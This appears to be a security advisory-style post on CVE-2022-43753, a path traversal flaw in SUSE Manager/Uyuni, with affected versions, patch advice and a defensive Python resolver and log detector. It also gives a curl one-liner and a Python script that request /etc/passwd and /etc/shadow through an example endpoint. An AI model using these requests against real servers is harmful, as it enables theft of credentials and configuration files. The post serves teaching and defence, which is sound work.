In late 2022, a critical security vulnerability was discovered in certain modules of the SUSE Manager Server (also known as Spacewalk/Uyuni). Tracked as CVE-2022-43753, this issue is a classic *Path Traversal* bug—one of the oldest tricks in the book, but still dangerous if left unchecked.
If successfully exploited, a remote attacker can read any file that the running tomcat user has access to. That means config files, private keys, and even user data could be at risk. Security teams running SUSE Manager or Uyuni need to know the details—how it works, who's vulnerable, how to exploit it, and how to fix it.
What is Path Traversal?
Path traversal (or directory traversal) lets an attacker access files outside of an intended directory by tricking the application’s file path logic, often with sequences like ../../../etc/passwd.
Suppose an application is supposed to let users access only their own documents, but it fails to sanitize the input path. An attacker might request:
GET /download?file=../../../../etc/passwd
If there’s no proper check, the server could return the sensitive /etc/passwd file.
- Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- Impact: Remote, unauthenticated attacker can read *any* file accessible by the user running the Spacewalk/Uyuni process (typically tomcat)
- Score: CVSS 7.5 High
Affected Products and Versions
The issue affects multiple packages and versions in the SUSE Manager, Spacewalk, and Uyuni product lines. Here are some of the key vulnerable packages:
spacewalk-java < 4.3.39
(Complete list in SUSE Security Announcements)
The Bug
Some endpoints in Spacewalk/Uyuni (Java-based code, see spacewalk-java) accepted user-supplied input as file paths but did not reliably sanitize .. (parent directory), its percent-encoded form %2e%2e, or similar variants in the path.
As a result, a remote attacker can craft a URL or POST request that tricks the backend into reading an arbitrary file outside the intended directory.
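The check the vulnerable endpoints lacked, as an added Python example that is not code from the Spacewalk/Uyuni project: hardened_resolve decodes the user-supplied path (including %2e%2e and double-encoded variants), canonicalises it and requires the result to stay under the serving root, shown next to the naive join the advisory describes; flag_traversal_requests applies the same decoding to access-log lines so an analyst can spot traversal attempts against the page's example endpoint. The serving root, the function names and the log lines are assumptions constructed for this example.

```python
import os
import re
from urllib.parse import unquote
ALLOWED_ROOT = "/usr/share/spacewalk/downloads"  # assumed serving root, not the product's real path

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %2e%2e and double-encoded %252e both collapse to '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def vulnerable_resolve(root: str, user_path: str) -> str:
    """The missing-check pattern the advisory describes: join the input and trust the result."""
    return os.path.normpath(os.path.join(root, fully_decode(user_path)))

def hardened_resolve(root: str, user_path: str) -> "str | None":
    """Decode, canonicalise, then require the final path to stay under root; None if it escapes."""
    decoded = fully_decode(user_path)
    # os.path.join discards root when the second argument is absolute, so refuse those early.
    if "\x00" in decoded or decoded.startswith(("/", "\\")):
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    # commonpath compares whole components, so a sibling like downloads-old does not count as inside.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate

def flag_traversal_requests(log_lines):
    """Detection: return request targets whose decoded form contains '../' or '..\\'."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if m and re.search(r"\.\.[/\\]", fully_decode(m.group(1))):
            hits.append(m.group(1))
    return hits

# Constructed access-log lines: the endpoint is the page's example, hosts and sizes are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2022:15:15:00 +0000] "GET /rpc/api/download_file?path=LOGO.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Nov/2022:15:15:01 +0000] "GET /rpc/api/download_file?path=../../../../etc/passwd HTTP/1.1" 200 2140',
    '10.0.0.9 - - [10/Nov/2022:15:15:02 +0000] "GET /rpc/api/download_file?path=%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 2140',
]
```

Running vulnerable_resolve on the traversal input from the log yields /etc/passwd, while hardened_resolve returns None for every encoded or absolute variant and only accepts paths that resolve inside ALLOWED_ROOT.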
- You run SUSE Manager 4.2 (not updated), with default configuration
- An attacker finds a vulnerable API endpoint like /rpc/api/download_file?path=LOGO.png
A typical exploit to view /etc/passwd might look like:
curl "https://susemanager.example.com/rpc/api/download_file?path=../../../../etc/passwd"
Example code (Python):
    import requests

    # Target (change as needed)
    base_url = "https://susemanager.example.com"
    endpoint = "/rpc/api/download_file"  # Example vulnerable endpoint

    # Target file to read (outside the allowed directory)
    target_file = "../../../../../etc/shadow"  # File normally off-limits

    # Build URL (may need to URL-encode on the real exploit)
    url = f"{base_url}{endpoint}?path={target_file}"
    response = requests.get(url, verify=False)

    if response.status_code == 200:
        print("[+] File read successful!")
        print(response.text)
    else:
        print("[-] Exploit failed. Status:", response.status_code)
What could you access?
- /etc/passwd
- /etc/shadow (if the process user has permission)
- /usr/share/spacewalk/config/ (any secret keys/configs)
Real-World Impact
If this were reachable by an attacker (which depends on network exposure), it could allow data breaches, sensitive information leaks, or subsequent privilege escalation. Because it concerns management servers, the impact could be widespread in enterprise Linux environments.
How to Fix and Mitigate
Good news: SUSE has released updates to patch this vulnerability.
- For SUSE Manager 4.2: Update all the affected packages. For example, upgrade spacewalk-java to version 4.2.44 or later.
References
- SUSE CVE-2022-43753 Advisory
- NIST CVE Entry
- Official Patch Notes (spacewalk-java)
- Path traversal vulnerabilities are old, but still dangerous
- Enterprise tools like SUSE Manager/Spacewalk are attractive targets due to the sensitive systems they manage
If you haven’t updated your SUSE Manager (4.2/4.3/Uyuni) servers yet, patch now.
*This post is exclusive content, written in plain American English, and intended to help security teams, sysadmins, and SUSE users understand and mitigate CVE-2022-43753. Sharing actual exploit details and code for educational purposes only—never use against systems you do not own!*
Timeline
Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC